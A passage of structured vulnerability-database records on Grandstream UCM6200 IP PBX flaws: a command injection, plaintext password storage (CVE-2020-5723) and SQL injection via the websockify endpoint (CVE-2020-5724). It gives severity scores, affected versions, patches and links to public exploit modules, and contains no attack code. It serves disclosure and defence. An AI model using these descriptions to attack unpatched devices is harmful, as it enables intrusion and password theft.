"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl;=1"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"date": "2019-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"date": "2019-03-30T17:29:00.683000",
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42874"
},
{
"date": "2023-03-01T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10662"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003014"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1226"
},
{
"date": "2023-03-01T14:51:39.837000",
"db": "NVD",
"id": "CVE-2019-10662"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6204 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003014"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1226"
}
],
"trust": 0.6
}
}
VAR-202003-1436
Vulnerability from variot - Updated: 2024-02-13 22:30The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.
Grandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1436",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lte",
"trust": 0.6,
"vendor": "grandstream",
"version": "\u003c=1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"cve": "CVE-2020-5723",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003514",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-20679",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5723",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003514",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5723",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-003514",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-20679",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1713",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-5723",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5723",
"trust": 3.1
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-20679",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5723",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"id": "VAR-202003-1436",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
}
]
},
"last_update_date": "2024-02-13T22:30:30.332000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "UCM6200 series",
"trust": 0.8,
"url": "http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series"
},
{
"title": "Patch for Grandstream UCM6200 privilege elevation vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/211855"
},
{
"title": "Grandstream UCM6200 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113108"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-312",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5723"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5723"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/312.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"date": "2020-03-30T20:15:19.883000",
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20679"
},
{
"date": "2020-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5723"
},
{
"date": "2020-04-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003514"
},
{
"date": "2020-04-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1713"
},
{
"date": "2020-04-01T14:58:35.183000",
"db": "NVD",
"id": "CVE-2020-5723"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UCM6200 Vulnerability in plaintext storage of important information in series",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003514"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1713"
}
],
"trust": 0.6
}
}
VAR-202003-1437
Vulnerability from variot - Updated: 2024-02-13 22:30The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1437",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"cve": "CVE-2020-5724",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003469",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-20680",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5724",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
